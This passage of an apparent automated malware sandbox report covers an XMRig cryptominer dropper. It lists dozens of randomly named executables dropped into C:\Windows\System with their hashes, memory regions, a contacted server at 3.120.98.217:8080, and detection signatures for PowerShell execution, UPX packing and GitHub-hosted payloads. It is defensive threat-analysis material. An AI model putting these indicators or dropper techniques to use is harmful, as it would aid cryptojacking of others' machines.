C:\Windows\System\qsvtyBS.exe

C:\Windows\System\qsvtyBS.exe

C:\Windows\System\rSlOweL.exe

C:\Windows\System\rSlOweL.exe

C:\Windows\System\YwvnmnR.exe

C:\Windows\System\YwvnmnR.exe

C:\Windows\System\kbRQfjG.exe

C:\Windows\System\kbRQfjG.exe

C:\Windows\System\bTldovO.exe

C:\Windows\System\bTldovO.exe

C:\Windows\System\TNEIbVh.exe

C:\Windows\System\TNEIbVh.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/3024-0-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/3024-2-0x000000013F8E0000-0x000000013FCD6000-memory.dmp

\Windows\system\PigjwOV.exe

MD5 af59d533dddfdf8dfb3591e366ec3897
SHA1 138d45d8946efb7804742fc113b31d161253d272
SHA256 77ca7efb7eea106a5a45caf72929f586c21ee6e54b496a6e7819abbc24dc3a13
SHA512 e7f2aa8b8e5f30fe729035c78f466dee3cb8b92b8cfcff75d3d3811cd5ab06798ba8df4185f8232243b981113a0a36440eabbe1fdc8f5d1f640ed11a21090dc8

memory/2340-8-0x000000013F4C0000-0x000000013F8B6000-memory.dmp

C:\Windows\system\biHOyov.exe

MD5 ecd5d01abfd44dc67a1104ece5884f05
SHA1 cd1a42cd5b0b1b1bc0f9f8c8e0364953d58d0f33
SHA256 e101850fc12602e324491a42044d8aad534dbdaeff953b99a41eb68fd7d675b5
SHA512 4e22d8e7918e192ca69aa85cd2ad2278746e222457c12a3f78f727406c8c62ac767eae70126b1f0b669e6cab22bf5d287e3463cc3e805b870c68f826f828eed9

memory/2536-17-0x000000013F270000-0x000000013F666000-memory.dmp

C:\Windows\system\QDAlBoD.exe

MD5 ddb19a395e4af256dbc36b16bfd5fcc7
SHA1 3fc658e7b7b89892022f87a4004f3220563389ec
SHA256 506a0031164fbf3a09a6e662bb7ba4c810140a3c28bca69580220026e033aca4
SHA512 4e0d186c6b2ee41c3590d82a1912814c9923ab9e1834bc243f2099861e98226d6a0a77eee1ad89347c996a31e24073ea2eb7d4418164b59b9dc92599a890dc1f

\Windows\system\RhHVibn.exe

MD5 ae115d59f89a2547c6f810ed8aac8833
SHA1 5e1fc4b989b474b125e4e8687324dd1b38082e56
SHA256 ba1142a112da08146fdeaf0e50cf8ea1751e72e73e9ad3446845adb8d6f046d0
SHA512 f9c03356345ac5420dfa27152f1ea12e74a27dcfe7e149053ceedc74c480c3345fbff8e6c63aa89d2564ec9805fb414e1620ede97171be7803150040456cc11d

C:\Windows\system\SKvETSg.exe

MD5 09d59c9e50a73039ae878602d5d75613
SHA1 27a3293fc90fce5f7638f7a8e91a38cb8b8e858d
SHA256 4a390def6cceefdd93fd8da938d8e4dcd71482ab8a16408251f2926cc35666b0
SHA512 9611c3ced32d09efe856774173ff23d824e848f293d367951b0c83599bc9bce0ddc6428524c8cf05107c3258e5a2d69a9867fb06cea2f0f47733b817e26f7574

C:\Windows\system\Fedxevy.exe

MD5 17686bbe5aa79b21a04d2d741d7cbcd5
SHA1 a6e4f3b2cbad31dd931c64c4d19dcb77358c75eb
SHA256 26b70f66135a50e0656e511c728394166545537e169407806db2cd7071c929a9
SHA512 e9b862ab2b97a095d7980d2309e4647da281237f28336108f603a8bf01919d6cb2a8e0d101f938e8799a4e64771adb2846947cc4fbe2d9bdc1014563fd32060e

\Windows\system\HHpPBpc.exe

MD5 1c63512346a2e7f9f9eb40cf1b581de9
SHA1 57980f8f2c90778ee98ec4ee1dd28864aef0101d
SHA256 da11ae359e30e43fa9bf987de92b820e647e45c2e506c3cc3119496be7943d8e
SHA512 c5dfb702b28d9bbd8d6ba69990bfd00215a41ea54729da51281cdf2b81bbdb51ccb69e5aaaed195eaf89115e152c8e50942698d281eb2883a64f977a626167df

C:\Windows\system\CtqiLgi.exe

MD5 d85d1d654396aa9cf28c7e590c61d252
SHA1 ae8da0dea007228f919788092de254644d986e5f
SHA256 c4fd329b26fcbceb56e09e15f691144ed5d36208277b9349f5c51c820b125ec8
SHA512 eea4d71c0dad131694e085e180d3ced2185d9927d0d9a30581013b414858851a9c2b56b5569c1712a169e71567a8b65efc825ccd2e4b9becad55cc6b3e8f1288

memory/2836-141-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

\Windows\system\hmoVzXV.exe

MD5 060e6befda980e514663c1793500ceaf
SHA1 0b7656c35a99092f208728e772c3d8c44cc8b82d
SHA256 2021c9797516397920ccf42189486ee51fe007b77e3011adb2ceb5f3689cb407
SHA512 e82fbb313231882853f3f8fc1d8ac05ed7f9adb0b5efc4dcb3d942f34a1717f0a6b5d7f2639b0a38e636d59ed5815c7e45e8f3bbd2137e967c87676bdff8ea64

memory/3024-161-0x00000000033B0000-0x00000000037A6000-memory.dmp

memory/3024-163-0x000000013F180000-0x000000013F576000-memory.dmp

memory/3024-165-0x00000000037B0000-0x0000000003BA6000-memory.dmp

memory/3024-167-0x00000000037B0000-0x0000000003BA6000-memory.dmp

memory/3024-169-0x000000013FFF0000-0x00000001403E6000-memory.dmp

memory/2892-172-0x000000013F590000-0x000000013F986000-memory.dmp

memory/3024-178-0x000000013FE50000-0x0000000140246000-memory.dmp

memory/3024-181-0x00000000033B0000-0x00000000037A6000-memory.dmp

C:\Windows\system\LVdrRmy.exe

MD5 997b5f39b537d97445ad55d66d748b56
SHA1 aaa555fd5944366e853f47246454b98e2297d798
SHA256 da5f8a22751ecbd89cc2b58337037776329c791f3a1912b56c93a5af84d7f76f
SHA512 2c2b1a91dbe9e10f8ddd5c46add1f91ba921bbd30bf48cebc70d79a1a91058633cc01a7aeb31e36265116c92c7ff1f0a9374386b213c65ea917a847f4414e5b7

C:\Windows\system\LIwrXIg.exe

MD5 e7f8ed1713f8c620551e0115ea1d0174
SHA1 b3c180207444be9c79ccaec668c43374c05c13d1
SHA256 b2442468ec8c6586e0054bb166343bc7381c64009a06824af1aa4afd985a65dc
SHA512 5bffb040c4b46070bc17dddafe9d985479d308ae934a944f46c05419ec6e6cfc3b4158d6ca0227939ebe0117aebea85c301defc2f8258bb30485a996f0801930

memory/2836-856-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

\Windows\system\XdwqfbZ.exe

MD5 a77692d038e1b832f611c4209954b8d8
SHA1 48f24ada7942d2927e008b2a3f062f268100b93a
SHA256 f0ace14538c61aa6b84bbd22753140520420aeb124502bc25e324709a99b555c
SHA512 1c50a4f52084e2a5f7601db02bc3d46f6988f4a56f113196b23bfa111035688bded050134ec4b7c5db1723c4f026aecacb9706a2382964dcf32bb7345f490181

\Windows\system\DMBAsuQ.exe

MD5 ddac181552fb7aebb4e6aa0044ef3bfa
SHA1 b5139e00d7b1c4fc0a0d5f9f964ed17135608998
SHA256 b75b2ef243d2171ef8a68e0915c46f4058f19bfb54a6df031242819307308f5b
SHA512 e3ac1c6e34bc36905082ba9f67b0dacf768f3e91ce1a4d90db57d001543c9b166254f2cbf51ff5639e05eeefcecca13b7e4b0f00f3b0f8cca0f89b7dfd80e0d4

C:\Windows\system\siHpAVP.exe

MD5 52ba919b0a449740f7ee683993b3a0a2
SHA1 bea88843d97ce6e4de956e86a1b75c6f2031a48b
SHA256 a694b98e1fe70e1ff6266c2ade1afc564442e11e9661a5ff95557a61661ac1da
SHA512 cfce0b75fc36c4960cb12f7e6ea387864c132cf16e4d87991b8ef3663d047a68e3a7362d7d07198fbca051a019f07c34122d58161de0e9dca0eed5fe07ac81f1

C:\Windows\system\mKJlZes.exe

MD5 5e357e73535a3fb106bf332b748fdaca
SHA1 a228064e1ff8cfccf733a029a22be8ce7894dd60
SHA256 0ac31c991b509f37c31bafbc715b84c5cf4fd75f5a6252194a9085ce02f09d0d
SHA512 90c534d3360efcdbc6f6b424fa01c1c878d71b66de897b95c6e947d3bdd532f6da73109d7a3f59b813322196a40eb299d1fac2032ad0b20c024841d6ff053e45

C:\Windows\system\QqsRSyx.exe

MD5 8b2f75e11a6921cd1455e2ecfa88f00e
SHA1 3df20379845936f2d81d699be5d0300225f8e688
SHA256 ea4b3e1c4e7301e7ea1425bda933ad4f9088cbf5d5cfdd30b9fc11830d96e8b7
SHA512 e87ec1707b3bacb9a8c43961478394debb7574b6cfedc2da024b9d29430cdc020fd5c36304ae221b7f19df554df1dbb4bda1ade49aed9181decd2bdeff887d71

C:\Windows\system\HKFXKCj.exe

MD5 4dd3c09fd5696a5bfa4a4002d426f253
SHA1 831d4fadeb35b34f4ae622393a4fad38ac2f09db
SHA256 26354dff3da96b4b64aad5024db743086f767df65e1477a2c0d6eaed246eee1f
SHA512 5fffbfc3faae1e395da1014b529eed380ce9457617a761d57478143b42c8ac723c066e57fbd6fad7fceb9cc94f2afb6349969d16eb43ceb8feb7d0cabed5fb21

memory/2836-183-0x0000000002060000-0x0000000002068000-memory.dmp

memory/1628-180-0x000000013FE50000-0x0000000140246000-memory.dmp

memory/2880-177-0x000000013F4B0000-0x000000013F8A6000-memory.dmp

C:\Windows\system\mJJVOuY.exe

MD5 efb3cf107f316ef217e9e2365fe5ef87
SHA1 b8495d1a7024849260e8a6ee690a49eb653cfa6b
SHA256 a061af1e76ee82455036b8fd30a0b273a903dd4af770c3a9b2421f1c0f4749da
SHA512 793e90ae2a598b17d6659ccd999b29c4f051ebb0394395518e20ccc38a25ba44e6be3086c87255c9febf937997a58b4c6f04077e7ba6f60166baee5b9eb2fc27

memory/3024-173-0x000000013F4B0000-0x000000013F8A6000-memory.dmp

memory/3024-171-0x00000000037B0000-0x0000000003BA6000-memory.dmp

memory/2516-170-0x000000013FFF0000-0x00000001403E6000-memory.dmp

memory/2452-168-0x000000013F930000-0x000000013FD26000-memory.dmp

memory/2172-166-0x000000013F570000-0x000000013F966000-memory.dmp

memory/2636-164-0x000000013F180000-0x000000013F576000-memory.dmp

memory/2720-162-0x000000013F960000-0x000000013FD56000-memory.dmp

memory/2448-156-0x000000013F850000-0x000000013FC46000-memory.dmp

memory/2836-154-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

C:\Windows\system\kJymasj.exe

MD5 17c051cea9698e599d321561b92ec2af
SHA1 fe3ac82aeb384a19290f06d99f3c8f79e8273910
SHA256 7dff76f96c70d8295eba4ed7aa690a106a14eb8e2c81ecab161d69db0b84b408
SHA512 08a4bc4e81fc79c8a5e22de32721a11f8d1f3cfe3f9426a74234fb452734747bfa415751289ad102010b91457e35e9e2689f654e6561acb61c53f8c6cd7e8c28

memory/2836-135-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

C:\Windows\system\WWGMLDG.exe

MD5 22c7a6b94089d0323334ce9c2c4fdb95
SHA1 762d9bca559eb060dba58b1e4e7202d096889842
SHA256 29e2f0f192a1c1633e920f17357a607eb0c4dd7441c361e5f65228a2d9fabc1c
SHA512 a89f1ac215c1fdc957508ec8daa1d852399ce11edb6039f5f215dac1fd55008158dadf749a69841f6aabd4f88db77d7e56809a7c3139fbac74cb9a3a46cb2734

C:\Windows\system\IaWMBNb.exe

MD5 82ec7be2df735f2f14432f0afbfc5f74
SHA1 42a1662af4d0e59d8df27baf9f4a94dbf4c0c5b5
SHA256 c765bded2324b0977d815a378ac2526018faa5a51f1eda2dea4d7de77cfbfdfd
SHA512 f506a850d8193344cf6e98b78136ea8a2985e468073a23ebf8b0036179c8922d5d39cb93d2caa6e03bc451b1b215124e537dd6460618a89fd806c6d71e1b1cce

C:\Windows\system\NmlVIiL.exe

MD5 b44b16b513e6bb0c92b542009b778361
SHA1 ce9bce5e1214eeeae0d2cf81434b849a9a2c9600
SHA256 22151c5c4d9b6a55eaab8136453b67adc782f2968edf27f3c7d81714ffa977e8
SHA512 19252f9846c7ebaa4e3417b8fa23949d7cc589cedbb6b90fcae6d8348d9d38e26c12338b133fb7432c924237ef5a87f50e1d6927706cf24a76487c6b0e3d2662

C:\Windows\system\aeNtqSw.exe

MD5 324e807748bdfe9912d3835b932bd170
SHA1 ddcff970cdb26e5862084ab9af671725de1d7a4d
SHA256 950669cd34e9f78e14d8f241a72de4f5c260d1a0f4954cb0dabc37a40af9ddf1
SHA512 eec908acf7f26817ec1239b7531048ce730fa8e5717c68d1d8772ef9f30a9f5babf1fce9b7d9211b1e11c015b3e45b1e217ae5d1e30191c951750dfc82da8d74

C:\Windows\system\OlBxnGD.exe

MD5 d1e0d19b573f42d9df402d30a919ce20
SHA1 af286aa49bb8354d68029904e359f83f4e3c0207
SHA256 e457dc9b9f5c88fbccd297f4434781d02207f042a6f9ad6ac047d75080734930
SHA512 c976afee40c995746f101b8ef69078f558f4096e5c67f11301c4c8a2fb739f802d9a138c729e7d02d31590fbfa4baba2df5a05c5292f3854d419e368cb6d8cb6

C:\Windows\system\vzYzWzB.exe

MD5 fc6120060e79be50903d2d98eef0ed72
SHA1 0c3bd511352d8be70aa708c318185c8cd9f5e823
SHA256 99ac681bf66792ddf41ba11b410a08ba2efc454a244c629cf8ac7702bd96fe4e
SHA512 ce920428816890c99d652b3d377536df0f3498aa0b713a87a29c5ff02f60fce9f85051088aa053ec4fbb869eb18fe01e91ece01c936f940d07132755b7f08297

C:\Windows\system\jxeMTPD.exe

MD5 8720b107358f16971a9f697f12571022
SHA1 7523109757b9d2be7242409f1743e0619e05de74
SHA256 114d851b53b8486ee4f7522cbfee783fa10a37f260babc1d30f45b65979228d8
SHA512 a48b54c865743111358f0d163fa1c47c133fd799bfefe3a37af2f99304f6ec1ebfe98821c509454da3c5cfd0ebe72f4c9aa1010814a01ecbd6a898186807b38f

C:\Windows\system\EPoxBxP.exe

MD5 8234b1712c6b99e9a904394920b8b35a
SHA1 88f35dcdb3bf0dad592b4a4027676c077e7f0c97
SHA256 78e6a2dba89db61920747fc94e7b32bcbed141d305c1205e85cf192b97a1fb48
SHA512 11b267671c0a9df4642a9b84e26f949ce29fe870ea62cbc7d16edde8a92932264fc3c25c32ff4335f46e80567e4c31134e786c048e2d5564a16fb45716630418

C:\Windows\system\CXuPzIZ.exe

MD5 5f04bc37bd7299be29fc0ad7aad3439f
SHA1 b742f79a8e1160d79809af58f4ad9924bbb46918
SHA256 5741bf0e8bb02964a2a79d51a9900aaf6efaa54d4787f7c5f646cef075860c4c
SHA512 8d57e5132ef549bdf2b01ff5ded8aab6d4138e48093919b1b662f3249a8542c63a3789a67ba4d9198819fc7da3a2a3fbc046b4b61b477fe33af20fb18f0c03e0

C:\Windows\system\aaqKwHW.exe

MD5 2243da19ba0148d522da26696fe67cd3
SHA1 8d0112a6155502d623ebaa62eeff2b5dca15e22a
SHA256 b6c3bc3c588ce4b4fb232ee3de90b51e54e58f625fe32f920d9330cb6222bc8c
SHA512 01b0ee46a70bbbca2606f88945701e64aa059fcc9dc8904a6a6c11be801d7c86acf4d4b7e275ed0c280991e5ba503e0f234e8272f44d39647e372e2e0e2bb4df

C:\Windows\system\lMouqlA.exe

MD5 9d8a3fbbe54cb976e9c48f0882d7b016
SHA1 3b6eeab675b65a0f226661996c7f76d92a0b4cf8
SHA256 73e98f1217bd423ef1fbcdba40fea9ec2c57681bbb19444d7d92e1b2ca734fef
SHA512 d3e51bc150d41a3fde875d7a5df0e46be856fce10252a8d6dda220dbb4f2397567ca1b78dde9978e9614dd34328b25fd5064926e2f0d4676382c65f6284bd761

C:\Windows\system\aFHiKLS.exe

MD5 a4aa16a4618d5a738d3be5c36a9fdc71
SHA1 2ba48a0a25abca376a8ff6f62ead5ba950dc3ff4
SHA256 1228191fbeffb99f2e9758f79d61541ec7ef11c95fbb7d17d8d7b3d3f66085d7
SHA512 d351ed88d257f8612f88f4ebc24b38534629e37f0769ef207bc5afb8af5f6b687dee0253bcbd43f184f0163fdbe3a29b07ff0d662b7faebc0dac87362c4d250c

C:\Windows\system\CPsMpIJ.exe

MD5 5555300b2d9566a02b58ef04cd539622
SHA1 833caf33e9680959f95c2fe42fd8b2571a4490ae
SHA256 2d5f5ba9fc7c51cc3c0d0c1d46219b4d8c0e511840a1aa196a0b15379f81a37a
SHA512 bcc4144d7bec735bd463b04009d584064890a48c11edaeebde0cbb00e069afa0dc48cbca500cd6340693d386e0029a3444013d21b0532f5dc2245d0cf876030f

memory/2836-27-0x000007FEF584E000-0x000007FEF584F000-memory.dmp

memory/2836-26-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2692-25-0x000000013F320000-0x000000013F716000-memory.dmp

memory/3024-24-0x000000013F320000-0x000000013F716000-memory.dmp

memory/3024-7-0x000000013F4C0000-0x000000013F8B6000-memory.dmp

memory/3024-2488-0x000000013F8E0000-0x000000013FCD6000-memory.dmp

memory/2340-2737-0x000000013F4C0000-0x000000013F8B6000-memory.dmp

memory/2536-3142-0x000000013F270000-0x000000013F666000-memory.dmp

memory/2692-3145-0x000000013F320000-0x000000013F716000-memory.dmp

memory/3024-3710-0x00000000037B0000-0x0000000003BA6000-memory.dmp

memory/3024-3784-0x000000013FE50000-0x0000000140246000-memory.dmp

C:\Windows\system\LBXhWPH.exe

MD5 b2496acc5e17e2c67abf0e50b34299c5
SHA1 e4d3a01a7b24014db52a37c4589da1d759e5cc01
SHA256 c1d0a5469aea2b6129f1befd08eacde0c0a8692b1b5daa6dcde087be41f93473
SHA512 ef684a29718cef3f70c3e4fcbaeffb53bbda0c6389282a7b2bddfe4ab783804c217814821e0c2a754448b3cb6bb99b294f93749f85fd1748233def0d92fa8251

memory/2340-6641-0x000000013F4C0000-0x000000013F8B6000-memory.dmp

memory/2720-6644-0x000000013F960000-0x000000013FD56000-memory.dmp

memory/1628-6679-0x000000013FE50000-0x0000000140246000-memory.dmp

memory/2692-6694-0x000000013F320000-0x000000013F716000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 06:29

Reported

2024-05-27 06:31

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\kWTdukO.exe N/A
N/A N/A C:\Windows\System\jKGXQmW.exe N/A
N/A N/A C:\Windows\System\xTKRzCy.exe N/A
N/A N/A C:\Windows\System\fihThal.exe N/A
N/A N/A C:\Windows\System\WOBYsrl.exe N/A
N/A N/A C:\Windows\System\mTCznBo.exe N/A
N/A N/A C:\Windows\System\tITsbPu.exe N/A
N/A N/A C:\Windows\System\mmekLBA.exe N/A
N/A N/A C:\Windows\System\fyrEXZB.exe N/A
N/A N/A C:\Windows\System\cTfcrhB.exe N/A
N/A N/A C:\Windows\System\zjZWkIq.exe N/A
N/A N/A C:\Windows\System\DrPRDZY.exe N/A
N/A N/A C:\Windows\System\jdTrbAD.exe N/A
N/A N/A C:\Windows\System\WOmEnfX.exe N/A
N/A N/A C:\Windows\System\AyvKFyt.exe N/A
N/A N/A C:\Windows\System\wOLVltp.exe N/A
N/A N/A C:\Windows\System\yjmkZRh.exe N/A
N/A N/A C:\Windows\System\uPHcopo.exe N/A
N/A N/A C:\Windows\System\kDltENi.exe N/A
N/A N/A C:\Windows\System\AdHalos.exe N/A
N/A N/A C:\Windows\System\UAfZBHJ.exe N/A
N/A N/A C:\Windows\System\QrtaWgQ.exe N/A
N/A N/A C:\Windows\System\sGypFto.exe N/A
N/A N/A C:\Windows\System\GsITysl.exe N/A
N/A N/A C:\Windows\System\xGOxUKZ.exe N/A
N/A N/A C:\Windows\System\LZLMVYI.exe N/A
N/A N/A C:\Windows\System\pZoYbYO.exe N/A
N/A N/A C:\Windows\System\ECVNDFH.exe N/A
N/A N/A C:\Windows\System\ObNNBvP.exe N/A
N/A N/A C:\Windows\System\jknWzoy.exe N/A
N/A N/A C:\Windows\System\pQjvVOh.exe N/A
N/A N/A C:\Windows\System\jWMixBW.exe N/A
N/A N/A C:\Windows\System\RXDScBz.exe N/A
N/A N/A C:\Windows\System\rDQGGgy.exe N/A
N/A N/A C:\Windows\System\kPVHMfK.exe N/A
N/A N/A C:\Windows\System\JZCWXgM.exe N/A
N/A N/A C:\Windows\System\Gzdxrok.exe N/A
N/A N/A C:\Windows\System\Eccluag.exe N/A
N/A N/A C:\Windows\System\hTiTqLg.exe N/A
N/A N/A C:\Windows\System\LaVuaSL.exe N/A
N/A N/A C:\Windows\System\FWiVsNf.exe N/A
N/A N/A C:\Windows\System\QBxInnR.exe N/A
N/A N/A C:\Windows\System\siQOrOm.exe N/A
N/A N/A C:\Windows\System\lGMrvqD.exe N/A
N/A N/A C:\Windows\System\kiNnmWo.exe N/A
N/A N/A C:\Windows\System\SLyuyXH.exe N/A
N/A N/A C:\Windows\System\CBusTsG.exe N/A
N/A N/A C:\Windows\System\fpKRDPJ.exe N/A
N/A N/A C:\Windows\System\DoZFbKu.exe N/A
N/A N/A C:\Windows\System\YlgXRVA.exe N/A
N/A N/A C:\Windows\System\aKtxQgX.exe N/A
N/A N/A C:\Windows\System\CsfwLAY.exe N/A
N/A N/A C:\Windows\System\zISihmg.exe N/A
N/A N/A C:\Windows\System\RwRCjrD.exe N/A
N/A N/A C:\Windows\System\gDnwfwW.exe N/A
N/A N/A C:\Windows\System\JBzfndE.exe N/A
N/A N/A C:\Windows\System\rFltmUM.exe N/A
N/A N/A C:\Windows\System\UxaOhqM.exe N/A
N/A N/A C:\Windows\System\SvgnFul.exe N/A
N/A N/A C:\Windows\System\zNgdogn.exe N/A
N/A N/A C:\Windows\System\BNeTCxF.exe N/A
N/A N/A C:\Windows\System\ngltaEG.exe N/A
N/A N/A C:\Windows\System\aWnQBKh.exe N/A
N/A N/A C:\Windows\System\kwayEEK.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ORwQakw.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\nFhCpTN.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\KncvJHV.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\SYXuXpX.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\KbPUePc.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\RaCALUQ.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\NxKSEkk.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\OoeRNdc.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\wxtgZKF.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\uHGOjLl.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\owRPBZj.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\NawBYEP.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\KbppFAC.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\hssgoSO.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\fihThal.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\FcvUKNX.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\SjjxJsD.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\jKGXQmW.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\iOrURNo.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\RmqzdBq.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\aiLuGBp.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\WXoKYcD.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\Gzdxrok.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\CmXYsLZ.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\UfQulXn.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\eHRhCjV.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\DyrJwpr.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
